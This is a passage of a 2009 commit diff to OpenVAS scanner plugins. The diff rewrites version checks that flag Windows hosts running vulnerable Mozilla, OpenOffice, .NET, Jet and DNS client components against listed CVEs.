- foreach filespec (test_file) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEProductVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - security_hole(port:0, proto:"Win_Mozilla"); - report = report + "Fileversion : C$ "+filespec + " "+v+string("\n"); - security_hole(port:0, proto:"Win_Mozilla", data:report); - } - break; - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"Win_Mozilla", data:report); - } - } +# Firefox Check +ffVer = get_kb_item("Firefox/Win/Ver"); +if(ffVer) +{ + # Grep for Firefox version < 2.0.0.14 + if(version_is_less(version:ffVer, test_version:"2.0.0.14")) + { + security_hole(0); + exit(0); } - test_version = "2.0.0.14"; # Test Thunderbird - test_file[0] = "Programme\Mozilla Thunderbird\thunderbird.exe"; - test_file[1] = "Prog Files\Mozilla Thunderbird\thunderbird.exe"; - foreach filespec (test_file) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEProductVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - security_hole(port:0, proto:"Win_Mozilla"); - report = report + "Fileversion : C$ "+filespec + " "+v+string("\n"); - security_hole(port:0, proto:"Win_Mozilla", data:report); - } - break; - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"Win_Mozilla", data:report); - } - } +} + +# Seamonkey Check +smVer = get_kb_item("Seamonkey/Win/Ver"); +if(smVer) +{ + # Grep for Seamonkey version < 1.1.9 + if(version_is_less(version:smVer, test_version:"1.1.9")) + { + security_hole(0); + exit(0); } - test_version = "1.1.9"; # Test SeaMonkey - test_file[0] = "Programme\mozilla.org\SeaMonkey\seamonkey.exe"; - test_file[1] = "Prog Files\mozilla.org\SeaMonkey\seamonkey.exe"; - foreach filespec (test_file) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEProductVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - security_hole(port:0, proto:"Win_Mozilla"); - report = report + "Fileversion : C$ "+filespec + " "+v+string("\n"); - security_hole(port:0, proto:"Win_Mozilla", data:report); - } - break; - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"Win_Mozilla", data:report); - } - } - } +} -exit(0); +# Thunderbird Check +tbVer = get_kb_item("Thunderbird/Win/Ver"); +if(tbVer) +{ + # Grep for Thunderbird version < 2.0.0.14 + if(version_is_less(version:tbVer, test_version:"2.0.0.14")){ + security_hole(0); + } +} Modified: trunk/openvas-plugins/scripts/smbcl_openoffice_CB-A08-0068.nasl =================================================================== --- trunk/openvas-plugins/scripts/smbcl_openoffice_CB-A08-0068.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/smbcl_openoffice_CB-A08-0068.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,3 +1,4 @@ +##################################################################################### # # This script was written by Carsten Koch-Mauthe # @@ -3,28 +4,29 @@ # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Updated By Antu Sanadi on 16/09/2009 +# +# +#################################################################################### if(description) { - script_id(90030); - script_version ("$Revision: 01 $"); - script_cve_id("CVE-2008-2152"); - name = "OpenOffice.org <= 2.4.1 vulnerability (Win)"; - script_name(name); + script_id(90030); + script_version ("$Revision: 03 $"); + script_cve_id("CVE-2008-2152"); + script_bugtraq_id(29622); + script_name("OpenOffice.org <= 2.4.1 vulnerability (Win)"); + desc = "The remote host is probably affected by the vulnerabilities described in + CVE-2008-2152 or CVE-2008-3282 on 64-bit platform's - desc = "The remote host is probably affected by the vulnerabilities described in -CVE-2008-2152 or CVE-2008-3282 on 64-bit platform's - -OpenOffice.org <= 2.4.1 vulnerability - -Impact - + Impact CVE-2008-2152 Integer overflow in the rtl_allocateMemory function in sal/rtl/source/alloc_global.c in OpenOffice.org (OOo) 2.0 through 2.4 allows remote attackers to execute arbitrary code via a crafted file that triggers a - heap-based buffer overflow. + heap-based buffer overflow. CVE-2008-3282 Integer overflow in the rtl_allocateMemory function @@ -34,78 +36,34 @@ remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted document, related to a 'numeric truncation error,' a - different vulnerability than CVE-2008-2152. - -References: + different vulnerability than CVE-2008-2152. + + References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2152 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3282 -Solution: + Solution: All OpenOffice.org users should upgrade to the latest version: + Risk factor : High"; -Risk factor : High -"; - - script_description(desc); - summary = "Determines OpenOffice.org <= 2.4.1 vulnerability"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - exit(0); + script_description(desc); + script_summary("Check for the version of OpenOffice"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("Buffer overflow"); + script_dependencies("secpod_openoffice_detect_win.nasl"); + script_require_keys("OpenOffice/Win/Ver"); + exit(0); } -# -# The code starts here -# + include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); -sec_hole = 0; -sec_proto = "OpenOffice.org"; -test_version = "2.4.9310"; -ver = NULL; -r = NULL; - - sec_hole = 0; - path = "Programme\"; - share ="C$"; - prog = "OpenOffice.org*"; - r = smbgetdir(share: share, dir: path+prog, typ: 2 ); - if( isnull(r) ) { - path = "Program Files\"; - r = smbgetdir(share: share, dir: path+prog, typ: 2 ); +openVer = get_kb_item("OpenOffice/Win/Ver"); +if(openVer != NULL) +{ + if(version_is_less_equal(version:openVer, test_version:"2.4.1")){ + security_hole(0); } - if( !isnull(r) ) { - foreach oodir (r) { - file_spec = path+oodir+"\program\version.ini"; - r = smbgetdir(share: "C$", dir: file_spec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: file_spec, tmp_filename: tmp_filename) ) { - ver = fread(tmp_filename); - unlink(tmp_filename); - if( ! isnull(ver) ) { - version = ereg_replace(pattern:".+OOOBaseVersion=", string: ver, replace: "")+"."; - version = eregmatch(pattern:"([0-9]\.)+[0-9]+", string: version); - build = ereg_replace(pattern:".+ProductBuildid=", string: ver, replace: ""); - build = eregmatch(pattern:"^[0-9]+", string: build); - ver = version[0]+"."+build[0]; - set_kb_item(name: "OpenOffice.org/Build", value: ver); - if( version_is_less(version:ver, test_version:test_version) ) { - if(sec_hole == 0) { - security_warning(port:0, proto:sec_proto); - sec_hole = 1; - } - security_warning(port:0, proto:sec_proto, data:string("\nFound : ") + oodir + - " Build : " + ver + string("\n")); - } - } - } - } - } - } -exit(0); +} Modified: trunk/openvas-plugins/scripts/win_CVE-2007-0043.nasl =================================================================== --- trunk/openvas-plugins/scripts/win_CVE-2007-0043.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/win_CVE-2007-0043.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,90 +1,98 @@ +################################################################################# # +# # This script was written by Carsten Koch-Mauthe # # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 02 $ +# Updated by: +# Antu Sanadi on 16/09/22 +# +############################################################################### if(description) { + script_id(90010); + script_version ("$Revision: 02 $"); + script_cve_id("CVE-2007-0043"); + script_bugtraq_id(24811); + script_name(".NET JIT Compiler Vulnerability"); + desc = "The remote host is affected by the vulnerabilitys described in + CVE-2007-0043 - script_id(90010); - script_version ("$Revision: 01 $"); - script_cve_id("CVE-2007-0043"); - name = ".NET JIT Compiler Vulnerability"; - script_name(name); + Checking if System.web.dll version is less than 2.0.50727.832 - desc = "The remote host is affected by the vulnerabilitys described in -CVE-2007-0043 + Impact: + The Just In Time (JIT) Compiler service in Microsoft .NET Framework 1.0, 1.1, + and 2.0 for Windows 2000, XP, Server 2003, and Vista allows user-assisted + remote attackers to execute arbitrary code via unspecified vectors involving + an unchecked buffer, probably a buffer overflow, aka .NET JIT Compiler + Vulnerability. Checking if System.web.dll version is less than 2.0.50727.832 -Checking if System.web.dll version is less than 2.0.50727.832 + References: + http://secunia.com/advisories/26003 + http://securitytracker.com/alerts/2007/Jul/1018356.html + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0043 + http://www.microsoft.com/technet/security/Bulletin/ms07-040.mspx -Impact - The Just In Time (JIT) Compiler service in Microsoft - .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, - Server 2003, and Vista allows user-assisted remote - attackers to execute arbitrary code via unspecified - vectors involving an unchecked buffer, probably a - buffer overflow, aka .NET JIT Compiler Vulnerability. - Checking if System.web.dll version is less than 2.0.50727.832 + Solution: + All Users should upgrade to the latest version. + http://www.microsoft.com/technet/security/Bulletin/ms07-040.mspx -References: - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0043 + Risk factor : High"; -Solution: - All Users should upgrade to the latest version. + script_description(desc); + script_summary("Test for .NET JIT Compiler Vulnerability"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("Windows : Microsoft Bulletins"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} -Risk factor : High"; +include("smb_nt.inc"); +include("secpod_reg.inc"); +include("version_func.inc"); +include("secpod_smb_func.inc"); - script_description(desc); - summary = "Test for .NET JIT Compiler Vulnerability"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - script_require_ports(139, 445); - exit(0); +if(hotfix_check_sp(xp:4, win2k:5, win2003:3) <= 0){ + exit(0); } -# -# The code starts here -# +key = "SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDlls\"; +foreach item (registry_enum_values(key:key)) +{ + if("System.Web.dll" >< item) + { + path = item; + break; + } +} -include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); +if(!path){ + exit(0); +} - test_version = "2.0.50727.832"; - win_dir = get_windir(); - if( !isnull(win_dir) ) { - path = win_dir+"Microsoft.NET\Framework\"; - filespec = "v2*"; - r = smbgetdir(share: "C$", dir: path+filespec, typ: 2 ); - if( !isnull(r) ) { - filespec = r[0]+"\"+"system.web.dll"; - r = smbgetdir(share: "C$", dir: path+filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - orig_filename = path+filespec; - if( smbgetfile(share: "C$", filename: orig_filename, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:orig_filename); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - security_hole(port:0, proto:"SMB"); - report = report + "Fileversion : C$ "+orig_filename + " "+v+string("\n"); - security_hole(port:0, proto:"SMB", data:report); - } - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } - } else { - report = string(".NET V2xx not found/no access -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } +if("c:" >< path){ + path = ereg_replace(pattern:"c:", replace:"C:", string:path); +} -exit(0); +share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:path); +file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:path); +dllVer = GetVer(file:file, share:share); + +if(!dllVer){ + exit(0); +} + +# Check for .Net Framework version 1.0 < 1.0.3705.6060, 1.1 < 1.1.4322.2407 +# and 2.0 < 2.0.50727.832 +if(version_in_range(version:dllVer, test_version:"1.0", test_version2:"1.0.3705.6059")|| + version_in_range(version:dllVer, test_version:"1.1", test_version2:"1.1.4322.2406")|| + version_in_range(version:dllVer, test_version:"2.0", test_version2:"2.0.50727.831")){ + security_hole(0); +} Modified: trunk/openvas-plugins/scripts/win_CVE-2007-6026.nasl =================================================================== --- trunk/openvas-plugins/scripts/win_CVE-2007-6026.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/win_CVE-2007-6026.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,3 +1,4 @@ +################################################################################## # # This script was written by Carsten Koch-Mauthe # @@ -3,137 +4,114 @@ # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Updated By: +# Antu Sanadi on 16/09/2009 +# +# +################################################################################## if(description) { + script_id(90024); + script_version ("$Revision: 03 $"); + script_cve_id("CVE-2007-6026"); + script_bugtraq_id(28398); + script_name("Windows Vulnerability in Microsoft Jet Database Engine"); + desc = "The remote host is probably affected by the vulnerability described in + CVE-2007-6026 - script_id(90024); - script_version ("$Revision: 01 $"); - script_cve_id("CVE-2007-6026"); - name = "Windows Vulnerability in Microsoft Jet Database Engine"; - script_name(name); - - desc = "The remote host is probably affected by the vulnerability described in -CVE-2007-6026 - - -Impact + Impact Stack-based buffer overflow in Microsoft msjet40.dll 4.0.8618.0 (aka Microsoft Jet Engine), as used by Access 2003 in Microsoft Office 2003 SP3, allows user-assisted attackers to execute arbitrary code via a crafted MDB file database file containing a column structure with a modified column count. NOTE: this might be the - same issue as CVE-2005-0944. + same issue as CVE-2005-0944. -References: + References: + http://www.us-cert.gov/cas/techalerts/TA08-134A.html + http://securitytracker.com/alerts/2007/Nov/1018976.html http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6026 http://www.microsoft.com/technet/security/bulletin/ms08-028.mspx -Solution: + Solution: All Users should upgrade to the latest version. + Risk factor : High"; -Risk factor : High"; + script_description(desc); + script_summary("Windows Vulnerability in Microsoft Jet Database Engine"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("Windows : Microsoft Bulletins"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} - script_description(desc); - summary = "Windows Vulnerability in Microsoft Jet Database Engine"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - script_require_ports(139, 445); - exit(0); + +include("smb_nt.inc"); +include("secpod_reg.inc"); +include("version_func.inc"); +include("secpod_smb_func.inc"); + +if(hotfix_check_sp(xp:4, win2k:5, win2003:3) <= 0){ + exit(0); } -# -# The code starts here -# +if((hotfix_missing(name:"950749") == 0)){ + exit(0); +} -local_var os; +dllPath = registry_get_sz(key:"SOFTWARE\Microsoft\COM3\Setup", + item:"Install Path"); +if(!dllPath){ + exit(0); +} -include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); +share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:dllPath); +file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:dllPath + "\Msjet40.dll"); - win_dir = get_windir(); - sec_hole = 0; - if( !isnull(win_dir) ) { - os = get_kb_item("SMB/OS"); - filespec = win_dir+"system32\Msjint40.dll"; - test_version = NULL; - if( "WINDOWS 5.1" >< os ) { - test_version = "4.0.9502.0"; - } else { - if( "WINDOWS SERVER 2003" >< os ) { - test_version = "4.0.9502.0"; - } else { - if( "WINDOWS 5.0" >< os ) { - test_version = "4.0.9502.0"; - } - } +dllVer = GetVer(file:file, share:share); +if(!dllVer){ + exit(0); +} + +# Windows 2K +if(hotfix_check_sp(win2k:5) > 0) +{ + # Grep for Msjet40.dll version < 4.0.9511.0 + if(version_is_less(version:dllVer, test_version:"4.0.9511.0")){ + security_hole(0); + } +} + +# Windows XP +else if(hotfix_check_sp(xp:3) > 0) +{ + SP = get_kb_item("SMB/WinXP/ServicePack"); + if("Service Pack 2" >< SP) + { + # Grep for Msjet40.dll < 4.0.9511.0 + if(version_is_less(version:dllVer, test_version:"4.0.9511.0")){ + security_hole(0); } - if( !isnull(test_version) ) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - if( sec_hole == 0 ) { - security_hole(port:0, proto:"Win"); - sec_hole = 1; - } - security_hole(port:0, proto:"Win", data:"Version found : C$ "+filespec + " "+v+string("\n")+ - "Version expected : "+test_version+" or higher "+string("\n")); - } - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } else { - report = string(filespec+" not found/no access -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } - filespec = win_dir+"system32\Msjet40.dll"; - test_version = NULL; - if( "WINDOWS 5.1" >< os ) { - test_version = "4.0.9511.0"; - } else { - if( "WINDOWS SERVER 2003" >< os ) { - test_version = "4.0.9511.0"; - } else { - if( "WINDOWS 5.0" >< os ) { - test_version = "4.0.9511.0"; - } - } - } - if( !isnull(test_version) ) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - if( sec_hole == 0 ) { - security_hole(port:0, proto:"Win"); - sec_hole = 1; - } - security_hole(port:0, proto:"Win", data:"Version found : C$ "+filespec + " "+v+string("\n")+ - "Version expected : "+test_version+" or higher "+string("\n")); - } - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } else { - report = string(filespec+" not found/no access -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } } + else + security_hole(0); +} -exit(0); +# Windows 2003 +else if(hotfix_check_sp(win2003:2) > 0) +{ + SP = get_kb_item("SMB/Win2003/ServicePack"); + if("Service Pack 1" >< SP) + { + # Grep for Msjet40.dll version < 4.0.9511.0 + if(version_is_less(version:dllVer, test_version:"4.0.9511.0")){ + security_hole(0); + } + } +} Modified: trunk/openvas-plugins/scripts/win_CVE-2008-0080.nasl =================================================================== --- trunk/openvas-plugins/scripts/win_CVE-2008-0080.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/win_CVE-2008-0080.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,107 +1,127 @@ -# +################################################################################ # This script was written by Carsten Koch-Mauthe # # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Modified to Implement 'smb_nt.inc' +# - By Nikita MR On 2009-09-18 +################################################################################ if(description) { + script_id(90015); + script_version ("$Revision: 03 $"); + script_cve_id("CVE-2008-0080"); + script_bugtraq_id(27670); + script_name("Mini-Redirector Heap Overflow Vulnerability"); + desc = " + Overview: This host has critical security update missing according to + Microsoft Bulletin MS008-007 - script_id(90015); - script_version ("$Revision: 01 $"); - script_cve_id("CVE-2008-0080"); - name = "Mini-Redirector Heap Overflow Vulnerability"; - script_name(name); + Vulnerability Insight: + A boundary error occurs in the WebDAV Mini-Redirector when handling long + pathnames in WebDAV responses. - desc = "The remote host is probably affected by the vulnerability described in -CVE-2008-0080 + Impact: + Succesful exploitation will allow attackes to execute arbitrary code and + completely compromise the affected computer. + References: + http://secunia.com/advisories/28894 + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0080 + http://www.microsoft.com/technet/security/bulletin/ms08-007.mspx -Impact - Heap-based buffer overflow in the WebDAV Mini-Redirector - in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, - and Vista allows remote attackers to execute arbitrary - code via a crafted WebDAV response. + Workarounds: + Disable the WebClient Service. -References: - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0080 - http://www.microsoft.com/technet/security/bulletin/ms08-007.mspx + Solution: + Run Windows Update and update the listed hotfixes or download and + update mentioned hotfixes in the advisory from the below link, + http://www.microsoft.com/technet/security/bulletin/ms08-007.mspx + Risk factor : Critical"; -Workarounds - Disable the WebClient Service. + script_description(desc); + script_summary("Mini-Redirector Heap Overflow Vulnerability"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("Windows : Microsoft Bulletins"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_ports(139, 445); + exit(0); +} -Solution: - All Users should upgrade to the latest version. +include("smb_nt.inc"); +include("secpod_reg.inc"); +include("version_func.inc"); +include("secpod_smb_func.inc"); +if(hotfix_check_sp(xp:3, win2003:3) <= 0) +{ + exit(0); +} -Risk factor : High"; +# MS08-007 Hotfix check +if(hotfix_missing(name:"946026") == 0) +{ + exit(0); +} - script_description(desc); - summary = "Mini-Redirector Heap Overflow Vulnerability"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - script_require_ports(139, 445); - exit(0); +sysPath = registry_get_sz(item:"Install Path", + key:"SOFTWARE\Microsoft\COM3\Setup"); +if(!sysPath) +{ + exit(0); } -# -# The code starts here -# +share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:sysPath); +file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", + string:sysPath + "\drivers\mrxdav.sys"); +sysVer = GetVer(file:file, share:share); +if(!sysVer) +{ + exit(0); +} -local_var os; +# Windows XP +if(hotfix_check_sp(xp:3) > 0) +{ + SP = get_kb_item("SMB/WinXP/ServicePack"); + if("Service Pack 2" >< SP) + { + # Grep for mrxdav.sys version < 5.1.2600.3276 + if(version_in_range(version:sysVer, test_version:"5.1", + test_version2:"5.1.2600.3275")){ + security_hole(0); + } + } + else + security_hole(0); +} -include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); - - win_dir = get_windir(); - if( !isnull(win_dir) ) { - os = get_kb_item("SMB/OS"); - filespec = win_dir+"system32\drivers\mrxdav.sys"; - test_version = NULL; - if( "WINDOWS VISTA" >< os ) { - test_version = "6.0.6000.16626"; - } else { - if( "WINDOWS 5.1" >< os ) { - test_version = "5.1.2600.3276"; - } else { - if( "WINDOWS SERVER 2003" >< os ) { - if( "SERVICE PACK 2" >< os ) { - test_version = "5.2.3790.4206"; - } else { - test_version = "5.2.3790.3060"; - } - } - } +# Windows 2003 +else if(hotfix_check_sp(win2003:3) > 0) +{ + SP = get_kb_item("SMB/Win2003/ServicePack"); + if("Service Pack 2" >< SP) + { + # Grep for mrxdav.sys version < 5.2.3790.4206 + if(version_in_range(version:sysVer, test_version:"5.2", + test_version2:"5.2.3790.4205")){ + security_hole(0); } - if( !isnull(test_version) ) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - orig_filename = filespec; - if( smbgetfile(share: "C$", filename: orig_filename, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:orig_filename); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - security_hole(port:0, proto:"Win"); - report = report + "Fileversion : C$ "+orig_filename + " "+v+string("\n"); - security_hole(port:0, proto:"Win", data:report); - } - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } else { - report = string(filespec+" not found/no access -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } + } + else if("Service Pack 1" >< SP) + { + # Grep for mrxdav.sys version < 5.2.3790.3060 + if(version_in_range(version:sysVer, test_version:"5.2", + test_version2:"5.2.3790.3059")){ + security_hole(0); } } - -exit(0); + else + security_hole(0); +} Modified: trunk/openvas-plugins/scripts/win_CVE-2008-0087.nasl =================================================================== --- trunk/openvas-plugins/scripts/win_CVE-2008-0087.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/win_CVE-2008-0087.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,108 +1,117 @@ -# +##################################################################################### # This script was written by Carsten Koch-Mauthe # # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Modified to Implement 'smb_nt.inc' +# - By Sharath S On 2009-09-21 +# +###################################################################################### if(description) { + script_id(90020); + script_version ("$Revision: 03 $"); + script_cve_id("CVE-2008-0087"); + script_bugtraq_id(28553); + script_name("Windows vulnerability in DNS Client Could Allow Spoofing (945553)"); + desc = " + The remote host is probably affected by the vulnerability described in + CVE-2008-0087 - script_id(90020); - script_version ("$Revision: 01 $"); - script_cve_id("CVE-2008-0087"); - name = "Windows vulnerability in DNS Client Could Allow Spoofing (945553)"; - script_name(name); + Impact: + The DNS client in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, + and Vista uses predictable DNS transaction IDs, which allows remote attackers + to spoof DNS responses. - desc = "The remote host is probably affected by the vulnerability described in -CVE-2008-0087 + References: + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0087 + http://www.microsoft.com/technet/security/bulletin/ms08-020.mspx + Solution: + All Users should upgrade to the latest version. -Impact - The DNS client in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 - and SP2, and Vista uses predictable DNS transaction IDs, which allows - remote attackers to spoof DNS responses. + Risk factor : High"; -References: - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0087 - http://www.microsoft.com/technet/security/bulletin/ms08-020.mspx + script_description(desc); + script_summary("Windows vulnerability in DNS Client Could Allow Spoofing (945553)"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("Windows : Microsoft Bulletins"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} -Solution: - All Users should upgrade to the latest version. +include("smb_nt.inc"); +include("secpod_reg.inc"); +include("version_func.inc"); +include("secpod_smb_func.inc"); -Risk factor : High"; +if(hotfix_check_sp(xp:3, win2k:5, win2003:3) <= 0){ + exit(0); +} - script_description(desc); - summary = "Windows vulnerability in DNS Client Could Allow Spoofing (945553)"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - script_require_ports(139, 445); - exit(0); +# MS08-020 Hotfix check +if(hotfix_missing(name:"945553") == 0){ + exit(0); } -# -# The code starts here -# +dllPath = registry_get_sz(key:"SOFTWARE\Microsoft\COM3\Setup", + item:"Install Path"); +if(!dllPath){ + exit(0); +} -local_var os; +share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:dllPath); +file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", + string:dllPath + "\Dnsapi.dll"); -include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); +dllVer = GetVer(file:file, share:share); +if(!dllVer){ + exit(0); +} - win_dir = get_windir(); - sec_hole = 0; - if( !isnull(win_dir) ) { - os = get_kb_item("SMB/OS"); - filespec = win_dir+"system32\Dnsapi.dll"; - test_version = NULL; - if( "WINDOWS VISTA" >< os ) { - test_version = "6.0.6000.16615"; - } else { - if( "WINDOWS 5.1" >< os ) { - test_version = "5.1.2600.3316"; - } else { - if( "WINDOWS SERVER 2003" >< os ) { - if( "SERVICE PACK 2" >< os ) { - test_version = "5.2.3790.4238"; - } else { - test_version = "5.2.3790.3092"; - } - } else { - if( "WINDOWS 5.0" >< os ) { - test_version = "5.0.2195.7151"; - } - } - } +# Windows 2K +if(hotfix_check_sp(win2k:5) > 0) +{ + # Grep for Dnsapi.dll version < 5.0.2195.7151 + if(version_is_less(version:dllVer, test_version:"5.0.2195.7151")){ + security_hole(0); + } +} + +# Windows XP +else if(hotfix_check_sp(xp:3) > 0) +{ + # Grep for Dnsapi.dll < 5.1.2600.3316 + if(version_is_less(version:dllVer, test_version:"5.1.2600.3316")){ + security_hole(0); + } +} + +# Windows 2003 +else if(hotfix_check_sp(win2003:3) > 0) +{ + SP = get_kb_item("SMB/Win2003/ServicePack"); + if("Service Pack 2" >< SP) + { + # Grep for Dnsapi.dll version < 5.2.3790.4238 + if(version_is_less(version:dllVer, test_version:"5.2.3790.4238")){ + security_hole(0); } - if( !isnull(test_version) ) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - if( 